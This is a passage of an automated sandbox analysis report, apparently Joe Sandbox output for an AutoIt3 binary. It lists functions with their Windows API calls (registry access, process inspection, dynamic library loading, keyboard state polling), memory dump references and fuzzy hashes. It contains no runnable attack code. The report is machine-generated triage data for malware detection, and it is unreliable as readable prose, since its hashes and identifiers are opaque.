                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 3964851224-769500911
                                      • Opcode ID: 7f1b14c255ca4a7022df6f866942d393f141d2c10732c6add82c33ca1fa165c0
                                      • Instruction ID: 4b1e2af826eda927d07d108d36e7da63d2b79647090435c1d460df36e9f0fbc4
                                      • Opcode Fuzzy Hash: 7f1b14c255ca4a7022df6f866942d393f141d2c10732c6add82c33ca1fa165c0
                                      • Instruction Fuzzy Hash: 3B112A709001299F8F00EF98D9518EEF7B8FF16344B1045A9D914E7362EB765A0ACF50
                                      Function 0087F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0087F2F0
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0087F320
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0087F453
                                      • CloseHandle.KERNEL32(?), ref: 0087F4D4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: 092a959fa0ed1e8d4bb54917102846448b636aa507d9ec7660646e409251708f
                                      • Instruction ID: 88e50e73841d5bc9d770fa0d39bb9b1c0c34cbf3c317ea42dae99cbe5ee98887
                                      • Opcode Fuzzy Hash: 092a959fa0ed1e8d4bb54917102846448b636aa507d9ec7660646e409251708f
                                      • Instruction Fuzzy Hash: 74817CB16443019FD760EF29DC86B2AB7E5FF44710F14891DFA99DB2D2D6B0E8008B92
                                      Function 00880697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0088075D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088079C
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008807E3
                                      • RegCloseKey.ADVAPI32(?,?), ref: 0088080F
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0088081C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3440857362-0
                                      • Opcode ID: 980addf6e617f16732aad03e7693e6e6f5c596611d8855853514c1727bc45c14
                                      • Instruction ID: 8642a92b94274a1937230a8615b10719abbfdfbd42b438643f9a8acdc5d01829
                                      • Opcode Fuzzy Hash: 980addf6e617f16732aad03e7693e6e6f5c596611d8855853514c1727bc45c14
                                      • Instruction Fuzzy Hash: E4515771208204AFC744EB68CC85E6AB7E9FF84305F04892DF595C72A1DB31E948CF92
                                      Function 0087DFB1 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087E010
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0087E093
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0087E0AF
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0087E0F0
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087E10A
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867E51,?,?,00000000), ref: 00814041
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867E51,?,?,00000000,?,?), ref: 00814065
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      • Opcode ID: ffaef4c8b4502cfc38bbf91a15d10e95871eb59df79444cb910584de06a8b4b3
                                      • Instruction ID: f53fc7a9d641eb88c885a45674af9822e017f07630395cb03db1e2bd4c3523ba
                                      • Opcode Fuzzy Hash: ffaef4c8b4502cfc38bbf91a15d10e95871eb59df79444cb910584de06a8b4b3
                                      • Instruction Fuzzy Hash: B051E575A006099FDB10EFA8C8859ADB7B8FF08315B14C0A5E919EB351DB31ED85CF92
                                      Function 0086EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0086EC62
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0086EC8B
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0086ECCA
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0086ECEF
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0086ECF7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      • Opcode ID: 17488b0404dbcaf168498f83b9882b0b4e60113414600214c6c1602b2c5a489d
                                      • Instruction ID: b218f42281b96394f7c6f038e7e7ea22202ff558c07aeac3f17d068ef763bc36
                                      • Opcode Fuzzy Hash: 17488b0404dbcaf168498f83b9882b0b4e60113414600214c6c1602b2c5a489d
                                      • Instruction Fuzzy Hash: 58511975A00505DFDB01EFA8C9859AEBBF5FF08314B188099E909AB3A2CB31AD51DF51
                                      Function 0088A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5793d4ebdd537a7f824bf0867f78e6c62912d0bbac7551ea93d57585a0274674
                                      • Instruction ID: 0c9a35bfbd3b6ae1a8a890561b2a222e2f2e4296406fe2b24a7f907c61a57bfa
                                      • Opcode Fuzzy Hash: 5793d4ebdd537a7f824bf0867f78e6c62912d0bbac7551ea93d57585a0274674
                                      • Instruction Fuzzy Hash: 5741C175904118AFE718FB28CC88FA9BBB8FB09310F190166E996E72D1D770AD41EB51
                                      Function 00802714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00802727
                                      • ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                      • GetAsyncKeyState.USER32(00000001), ref: 00802769
                                      • GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 2a90a27ef8589a3122408c7063fa4940a32c22e69296b2d9bd28191d8f82c047
                                      • Instruction ID: 1de1013f9bef284769a50dc9de8dd910106a3c20e453aac7811ac207c97c42f8
                                      • Opcode Fuzzy Hash: 2a90a27ef8589a3122408c7063fa4940a32c22e69296b2d9bd28191d8f82c047
                                      • Instruction Fuzzy Hash: 18413975504219FFDF15AF68CC48AE9BB74FB45324F20835AF828E22A0CB70A950DB91
                                      Function 008595D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 008595E8
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00859692
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0085969A
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 008596A8
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008596B0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: f25f5fc8ef54eb0dc018253dd0ed74734f0c8b8b9f8832ebdc16179eed138222
                                      • Instruction ID: 81437aa28620cc5f0ab5c5f03a8fb8fdd2fa533221b6e68d6cd727bd908e0142
                                      • Opcode Fuzzy Hash: f25f5fc8ef54eb0dc018253dd0ed74734f0c8b8b9f8832ebdc16179eed138222
                                      • Instruction Fuzzy Hash: FF31CC71900219EFDB14CFA8D94CA9E3BB5FB54316F104229FD65EB2D0C3B09928DB91
                                      Function 0085BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0085BD9D
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0085BDBA
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0085BDF2
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0085BE18
                                      • _wcsstr.LIBCMT ref: 0085BE22
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      • Opcode ID: 2e027b3f874f785539b24b8e987c6fd2e064fc6888898170d4c9ae64e338a610
                                      • Instruction ID: 1b31f7b852f04b1e49c645eee2f9827cc8273691cfb23c77e4e8cd907709f6fc
                                      • Opcode Fuzzy Hash: 2e027b3f874f785539b24b8e987c6fd2e064fc6888898170d4c9ae64e338a610
                                      • Instruction Fuzzy Hash: 87213B32204214BFEB255B39EC0AEBB7BACFF55760F14402AFD09CA191EF61DC409661
                                      Function 0088B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • GetWindowLongW.USER32(0114B1E0,000000F0), ref: 0088B804
                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0088B829
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0088B841
                                      • GetSystemMetrics.USER32(00000004), ref: 0088B86A
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0087155C,00000000), ref: 0088B888
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Long$MetricsSystem
                                      • String ID:
                                      • API String ID: 2294984445-0
                                      • Opcode ID: 125258f9a792239291bc5322c2b91ba24aa9f74568e4de61c5dc0206ab1d1542
                                      • Instruction ID: 64fb62cf36209ad9710a857d05174f281eec39a4621e594ff8838b7079a87096
                                      • Opcode Fuzzy Hash: 125258f9a792239291bc5322c2b91ba24aa9f74568e4de61c5dc0206ab1d1542
                                      • Instruction Fuzzy Hash: C9214F71A14259AFCB24AF388C08B6A3BA8FF85765F154739F925D62E0D7309910DF90
                                      Function 00859EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00859ED8
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859F0A
                                      • __itow.LIBCMT ref: 00859F22
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859F4A
                                      • __itow.LIBCMT ref: 00859F5B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow$_memmove
                                      • String ID:
                                      • API String ID: 2983881199-0
                                      • Opcode ID: 415a8475132ce6727baf77ada8826794b65bd252f86056bb99e71ee5f8cf5db7
                                      • Instruction ID: d40ec275fd9c3dc278e104ce7665d2924f0b0fde96463d45b8718de02f2f6920
                                      • Opcode Fuzzy Hash: 415a8475132ce6727baf77ada8826794b65bd252f86056bb99e71ee5f8cf5db7
                                      • Instruction Fuzzy Hash: 76217431601204AFDB11AB54C88AEEE7BACFB95751F054025FE45D7281EA70C9899BA2
                                      Function 00876138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00876159
                                      • GetForegroundWindow.USER32 ref: 00876170
                                      • GetDC.USER32(00000000), ref: 008761AC
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 008761B8
                                      • ReleaseDC.USER32(00000000,00000003), ref: 008761F3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: 75a5ccf245a0d6f75c583b1b1a1da813ee68e84819456f2dc718ccae1d268628
                                      • Instruction ID: 6bbca6e3b59b83bf51866c4c8c59e3e2f0e2adbb0c3c8913ddcdacdaa1885c56
                                      • Opcode Fuzzy Hash: 75a5ccf245a0d6f75c583b1b1a1da813ee68e84819456f2dc718ccae1d268628
                                      • Instruction Fuzzy Hash: 44215075A00604AFD754EF69DD88A5ABBF5FF48350B048469E94AD7252DB30AC00CB91
                                      Function 008016CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00801729
                                      • SelectObject.GDI32(?,00000000), ref: 00801738
                                      • BeginPath.GDI32(?), ref: 0080174F
                                      • SelectObject.GDI32(?,00000000), ref: 00801778
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 21d9f940c1b5e2eb1af9d8cf7b268bdcdfb857734f7aaefbab473b596e60baac
                                      • Instruction ID: 471790111ef7edbe080dd6b2c0df492873122677da0f17e3c345acbaca9d2c56
                                      • Opcode Fuzzy Hash: 21d9f940c1b5e2eb1af9d8cf7b268bdcdfb857734f7aaefbab473b596e60baac
                                      • Instruction Fuzzy Hash: 17219A30904208EFDF119F29DC4CB697BB8FB00321F144266FA25D61E4D7B19891CF94
                                      Function 0085C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 910223fca03d0bfbb5287a494565219837e302665cfb082e707ea5f3f372b7e4
                                      • Instruction ID: 507dce4e8799a1164b4a7880ab16092de130813b6da07ce56e236e292eefe4dc
                                      • Opcode Fuzzy Hash: 910223fca03d0bfbb5287a494565219837e302665cfb082e707ea5f3f372b7e4
                                      • Instruction Fuzzy Hash: 1901D2A2B003193FDA106115AC86FAB736CFA7039AF184035FE16E6B41E764DF1886E1
                                      Function 0086504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00865075
                                      • __beginthreadex.LIBCMT ref: 00865093
                                      • MessageBoxW.USER32(?,?,?,?), ref: 008650A8
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008650BE
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008650C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                      • String ID:
                                      • API String ID: 3824534824-0
                                      • Opcode ID: 367c528e0866ae5233ed90237b63b562bfff11680b1212f7903459a3f74c04cd
                                      • Instruction ID: 7f1672bb4660dafa09e6a2c7537d8ac26df8836fd16df3b2337ac07c33d2acfc
                                      • Opcode Fuzzy Hash: 367c528e0866ae5233ed90237b63b562bfff11680b1212f7903459a3f74c04cd
                                      • Instruction Fuzzy Hash: 2A110472908B18BFC7019BA89C08A9B7BACFB45320F140256F916D3360D6718D448BF1
                                      Function 00858E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00858E3C
                                      • GetLastError.KERNEL32(?,00858900,?,?,?), ref: 00858E46
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00858900,?,?,?), ref: 00858E55
                                      • HeapAlloc.KERNEL32(00000000,?,00858900,?,?,?), ref: 00858E5C
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858E73
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: 7e59a838b4cbae2ba57eefafcb382a3074a818241e5427f6bdc2c195e0ac305d
                                      • Instruction ID: 48a6ea56064454f7765454fa64e693bd4346f2b73d5b1bdcfc0f818039249955
                                      • Opcode Fuzzy Hash: 7e59a838b4cbae2ba57eefafcb382a3074a818241e5427f6bdc2c195e0ac305d
                                      • Instruction Fuzzy Hash: 710146B1200204AFDB215FA6DC89D6B7BBDFF8A355B54052AF849D2220DB319C14CE60
                                      Function 008657FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0086581B
